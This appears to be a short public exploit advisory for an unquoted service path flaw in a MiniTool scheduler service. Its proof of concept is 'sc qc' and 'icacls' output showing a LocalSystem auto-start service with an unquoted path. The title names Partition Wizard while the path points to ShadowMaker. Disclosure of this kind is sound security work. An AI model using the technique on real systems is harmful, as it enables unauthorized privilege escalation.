# Exploit Title: MiniTool Partition Wizard - Unquoted Service Path # Date: 08/04/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.minitool.com/ # Software Link: https://www.minitool.com/download-center/ # Version: 12.0 # Tested: Windows 10 # PoC : C:\Users\saudh>sc qc MTSchedulerService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: MTSchedulerService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTSchedulerService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\saudh>icacls "C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe" C:\Program Files\MiniTool ShadowMaker\SchedulerService.exe NT AUTHORITY\SYSTEM:(I)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Users:(I)(RX) Successfully processed 1 files; Failed processing 0 files # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.